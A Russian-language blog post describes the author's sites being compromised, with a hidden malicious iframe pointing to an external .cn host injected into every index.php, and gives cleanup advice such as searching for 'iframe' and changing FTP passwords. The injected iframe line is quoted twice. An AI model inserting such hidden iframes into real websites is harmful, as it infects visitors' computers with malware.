Новое на сайте
- Изучаю ишимоку
- Черный список DNS серверов
- Поднять денег на форексе
- 17 шагов на пути к идеальному интернет-магазину
- Яндекс в Запорожье
- Интернет магазин
- «Адреса и организации» в Яндексе теперь для всех
- VDS manager, ISP manager
- Пульт Маулнета
artemia e-gold forex ftp gogetlinks joomla PR sape.ru seo uptime wayback machine wordpress wp-pagenavi xap.ru ТИЦ антиспам бекап бесплатный хостинг биржа ссылок браузер вирус движок сайта деньги домен заработок индексация марафет новичкам отчеты плагин платный хостинг поисковики полезные добавочки помощь раскрутка реклама сервисы ссылок серфинг создание сайта сплоги тема уязвимость хостинг юзабилити яндекс
Оказалось, что был вирус
Автор: moneyzpua
Пока не убедился в чем причина, не писал этот пост, хотя и проблемы все разрешил через 2 часа после взлома всех моих сайтов.
Сидел я себе в интернете, читал очередной интереснейший блог одного из авторов и попутно делал заметки в своем и тут опа, сайт стал недоступен. А через время я выяснил, что все мои сайты были прибиты чем-то непонятным. Они просто не открывались.
В код сайта, а именно в файлы index.php (во всех папках, неважно используются ли файлы или нет ) был добавлен такой текст
<iframe src="http://yourliteseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe>
Таким образом, при загрузке зараженных сайтов должен был в невидимом ифрейме одновременно загружаться сайт злоумышленников на котором находился вредоносный код, приводивший к заражению компьютера жертвы вирусом.
Так получилось с большинством сайтов в интернете, но не у меня. У меня как-то странно вышло, код добавлялся в таком виде в самом конце страницы:
<?php тралялля ?<iframe src="http://yourliteseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe>>
Как можно заметить, что код вставлялся автоматически, ребята хорошо продумали вирус и работал бы он у них прекрасно если бы код вставляли всего лишь на один символ правее.
Настоятельно рекомендую проверить все свои сайты на код, искать лучше всего по слову iframe. Если у Вас есть код такого вида, то чистите код, меняйте все свои пароли на ftp аккаунты и меняйте свой антивирус. Я свой хваленый NOD32 выкинул и поставил Avast!. Было бы еще неплохо снести винду и поставить ее заново как это сделал я.
Советую не хранить пароли от ftp в Total Commander’e или других ftp клиентах и регулярно делать бекапы. Поверьте моему опыту, когда случиться беда вы будете несказанно рады, что не ленились, только вот может быть уже поздно.
p.s.
Все равно храню все свои ftp пароли в Total Commander, а бекапы делаю не так как часто как хотелось бы.